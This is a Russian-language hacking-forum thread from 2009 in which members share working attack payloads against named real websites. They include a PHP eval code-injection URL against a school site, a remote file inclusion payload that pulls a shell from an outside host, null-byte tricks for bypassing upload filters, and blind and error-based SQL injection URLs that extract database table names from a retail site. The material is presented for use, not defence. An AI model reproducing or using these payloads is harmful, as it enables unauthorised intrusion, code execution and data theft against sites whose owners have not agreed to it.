HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.11.2009, 22:51
LzD
Banned
Регистрация: 24.07.2009
Сообщений: 85
Провел на форуме:
229533

Репутация: 43
По умолчанию

Цитата:
Сообщение от GenTao  
Ммм...без ифа никак не обойтись ? Длинная статья...в SIPT-е я так понял так не получится)Тогда чем перебирать ?
Грей писал скрипт для работы со слепыми инжектами
 
Ответить с цитированием

  #2  
Старый 24.11.2009, 23:33
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
По умолчанию

http://www.astangukool.edu.ee/rus/poll/db/comments.php?id={${eval(phpinfo())}}
 
Ответить с цитированием

  #3  
Старый 25.11.2009, 02:26
LzD
Banned
Регистрация: 24.07.2009
Сообщений: 85
Провел на форуме:
229533

Репутация: 43
По умолчанию

Цитата:
Сообщение от [Raz0r]  
http://www.astangukool.edu.ee/rus/poll/db/comments.php?id={${eval(phpinfo())}}
http://securityvulns.com/Odocument594.html
http://[target]/poll/comments.php?id={${include($ddd)}}{${exit()}}&ddd= Http://EvilShell
(с) alguidy[at]hotmail[.]com

Последний раз редактировалось LzD; 25.11.2009 в 02:28..
 
Ответить с цитированием

  #4  
Старый 25.11.2009, 18:01
wolmer
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503

Репутация: 229
По умолчанию

1. Объясните мне, все таки возможно отрубить конец названии файла нулл байтом при:
Content-Type: multipart/form-data

Если да то как это сделать? Правильно ли я это делаю
(этим -> %00 -> не получится отрубить естественно конец при multipart/form-data):
...
filename="thistest.php\x00.jpg"
...

второй вариант который пробывал:
...
filename="thistest.php\0.jpg"
...

2. Если выше перечисл. примеров отрубания конца нулл байтом работают при:
Content-Type: multipart/form-data

То как быть если часть названия файла до бек слеша ("\")
отрубается и считается директорией? Можно ли это обойти и все таки отрубить конец при:
Content-Type: multipart/form-data

Заранее спасибо за ответы
 
Ответить с цитированием

  #5  
Старый 26.11.2009, 01:51
svesve
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме:
1734541

Репутация: 214


По умолчанию

подскажите раскручиваемо??

http://www.wearhouse.ru/?page=item&id=125'

???
 
Ответить с цитированием

  #6  
Старый 26.11.2009, 02:05
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://www.wearhouse.ru/?page=item&id=125+and+ascii(substring((select+tabl e_name+from+information_schema.tables+limit+0,1),1 ,1))>1

свеб агрится на юнион =)
 
Ответить с цитированием

  #7  
Старый 26.11.2009, 02:11
svesve
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме:
1734541

Репутация: 214


По умолчанию

Каким образом догнать до этого?
софт?
опыт?
SIPT мне не помог(
 
Ответить с цитированием

  #8  
Старый 26.11.2009, 05:21
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
По умолчанию

Цитата:
Сообщение от svesve  
Каким образом догнать до этого?
софт?
опыт?
SIPT мне не помог(
Опыт + анализ
 
Ответить с цитированием

  #9  
Старый 26.11.2009, 10:19
svesve
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме:
1734541

Репутация: 214


По умолчанию

Цитата:
Сообщение от DrAssault  
Опыт + анализ
я так понимаю чтобы дернуть таблицы из informatiob schema надо будес с подазпросами мутить?
 
Ответить с цитированием

  #10  
Старый 26.11.2009, 12:42
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Цитата:
Сообщение от svesve  
я так понимаю чтобы дернуть таблицы из informatiob schema надо будес с подазпросами мутить?
http://www.wearhouse.ru/?page=item&id=125/**/and/**/1=(select/**/*/**/from(select/**/*/**/from(select/**/name_const((select/**/table_name/**/
from/**/information_schema.tables/**/limit/**/0,1)
,14)d)/**/as/**/t/**/join/**/(select/**/name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),14)e)b)a)--+

Вывод нужной инфы происходит в ошибку, смотри внимательно. Описание этого метода здесь https://forum.antichat.ru/threadnav119047-2-10.html
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.